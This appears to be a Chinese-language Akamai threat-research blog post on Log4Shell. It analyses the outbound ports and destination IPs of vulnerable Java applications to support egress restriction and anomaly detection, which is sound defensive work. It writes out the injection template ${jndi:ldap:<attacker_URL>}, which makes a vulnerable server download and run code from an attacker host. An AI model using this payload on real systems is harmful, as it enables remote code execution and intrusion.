Log4Shell：大规模高危漏洞之量化评估

服务器的可访问性加大了服务器上这一漏洞的复杂性。这一漏洞本身足以引起企业的担忧，而面向互联网的服务器则带来了更多的风险。攻击者可能会将此类服务器用作攻击媒介，借以入侵服务器所在网络。根据 Akamai 在 Log4j 互联网流量趋势 研究 中所开展的分析，我们能看到攻击者正在竭尽所能地大肆滥用这一漏洞，相关攻击的数量达到了惊人的程度。

在研究中，我们发现 91% 的数据中心在运行 Java 服务器端应用程序，这样的数字令人担忧。其中有超过 40% 的数据中心还在使用面向互联网的 Java 服务器。就该漏洞的整体风险状况而言，这又增添了一层复杂性。面向互联网的服务器很容易被外界访问，所以它们可能更容易被滥用。在这篇博文的下一部分，我们将着重探讨 Java 应用程序的出站通信，并提供一些缓解建议，以帮助防御者更好地监控和保护运行 Java 应用程序且面向互联网的服务器。

但请注意，即便数据中心内的所有 Java 服务器均为内部服务器（也就是说，不面向互联网），也不能盲目认定不存在相关风险。Log4Shell 虽然主要被视为一种入侵网络的手段，但已有一些个案表明，在内部服务器上运行的 Java 应用程序收到了面向互联网的服务器发来的日志，结果遭到入侵。因此，攻击者能轻而易举地利用 Log4Shell 实现横向移动，轻松程度就像初始入侵一样。

利用数据辅助缓解漏洞

Log4Shell 可以成为攻击者手中的利器，它能够将攻击载荷从攻击者控制的远程机器下载到受害者的机器，再加以运行。为此，攻击者要注入一条 ${jndi:ldap:<attacker_URL>} 格式的日志消息，这最终会触发从存在漏洞的应用程序进程到消息内嵌网址的连接。随后系统就会下载远程 Java 类对象，并在内存中加以执行。

在了解到这一点之后，Akamai 威胁研究实验室开始探究 Java 服务器的通信模式，特别关注容易受到 Log4Shell 相关攻击的一些应用程序。了解 Java 服务器与进程的常用通信方式可以为安全和 IT 从业者提供必要的信息，帮助其检测和抵御环境中的异常问题，最终阻止 Log4Shell 漏洞利用攻击，并让正常的业务运营不受干扰。

探究外发通信：Java 服务器是如何对外通信的？

为了解 Java 服务器与互联网的通信方式，我们首先量化了 Java 应用程序用于连接互联网的目标 TCP 端口数量。根据我们的分析，绝大多数面向互联网的服务器均通过极少数几个（不到 10 个）端口进行通信。

这突显出一个事实：对允许从数据中心的不同服务器和进程外发的通信加以限制十分重要，也能带来安全方面的好处。也就是说，针对迄今为止始终通过一组特定端口通信的一个进程，识别其第一次与某个目标端口通信的情况，这样就能有效地辨别攻击企图。

我们针对几个常用 Java 应用程序，进一步细化了这一探索思路。

特定应用程序的通信模式

利用 Akamai Guardicore Segmentation 特有的进程级监测能力，Akamai 威胁研究实验室能够收集到有关容易受到 Log4Shell 攻击的特定应用程序的具体行为信息。这些数据可用于研究这些过程的正常行为、检测异常，并相应地创建有效的细分规则。

研究团队研究了四种常见易受攻击应用程序的通信模式（我们在括号中指明了触发网络流量的进程）：

• Elasticsearch： 一种十分流行的全文搜索引擎，具有多种应用场景 (%elasticsearch%/bin/java)

• Logstash： 服务器端数据处理管道，用于数据提取和数据转换 (/usr/share/logstash/jdk/bin/java)

• VMware vCenter： 用于 VMware 虚拟机和 ESXi 主机的管理平台 (%\VMware\vCenter Server\%\bin\java.exe)

• Okta RADIUS 代理： 一种用于将 RADIUS 身份验证委派给 Okta 身份管理解决方案的代理 (okta-radius.exe)

我们希望找到以下问题的答案：

• 这些应用程序通常连接到哪些目标端口？

• 具体来说，当目标端位于互联网上的时候，这些应用程序会连接到哪些端口？

在观察来自不同生产环境的聚合数据之后，我们获得了一些独特的见解。我们观察到，应用程序用到的互联网目标端口的数量寥寥无几：

但仅观察端口有时还不够，因为攻击者可以改变用来下载攻击载荷的端口，从而轻易隐藏自己的踪迹。

为了通过这样的数据得出更有用的结论，我们还需要研究目标 IP 地址，以此来了解通过这些端口进行的正常活动有哪些。有了 IP 地址信息，攻击者就更难隐藏自己的踪迹：如果某台服务器仅与互联网上的一个 IP 地址通信，那么攻击者必须获得该 IP 地址所对应服务器的控制权，然后通过该 IP 地址所对应的服务器传输恶意攻击载荷。因此，研究目标 IP 地址对于防御非常有用。

这样的分析能提供各应用程序通过各端口所连接的“唯一 IP 地址”的平均数量。数量恒定、少量的 IP 地址让企业有机会从另一个角度做出有效的防御和/或检测。也就是说，如果某个应用程序仅与少量 IP 地址通信，那么所有其他连接均可视为可疑。

我们观察了通过端口 443 和端口 80 连接的“唯一目标 IP 地址”的数量，并且注意到在几乎所有情况下，其数量均很少，而且这个数量长时间保持恒定不变的状态：

许多易受攻击的应用程序都具有较为有限的连接模式（不论从目标端口还是目标 IP 地址的角度来看皆是如此），认识到这一点有助于减小攻击面并开展有效的攻击检测。

结论

针对 Log4Shell 漏洞，我们最为推崇的缓解措施就是及时给 Log4j 库安装补丁。但众所周知，在生产环境中，有些时候无法安装补丁，或者无法迅速安装补丁。

我们针对多种易受攻击应用程序的通信行为的研究结论提供了另一种缓解方法，可以帮助企业减小攻击面并有效检测 Log4Shell 漏洞利用攻击（以及其他攻击）。

我们鼓励网络管理员研究易受攻击应用程序的通信模式，并理清其出站连接（包括目标 IP 地址和目标端口在内）。在掌握这些信息之后，防御者即可将出站连接控制在最低限度，仅允许通过已知标准通信端口传输的流量。

如果出于客观情况不能阻止连接，我们建议监测面向互联网的服务器发起的连接中存在的异常情况，包括使用不同以往的新端口或连接有违往常规律的新 IP 地址等等。Akamai Guardicore Segmentation 用户可以利用进程级信息，更好地监测各服务器执行的各种连接。对于 Hunt 客户，我们的威胁搜寻团队会主动研究这些数据，帮助这些客户排忧解难。

有关抵御 Log4Shell 攻击的更多信息，请阅读我们的博文： 《使用 Akamai Guardicore Segmentation 抵御 Log4j 滥用》。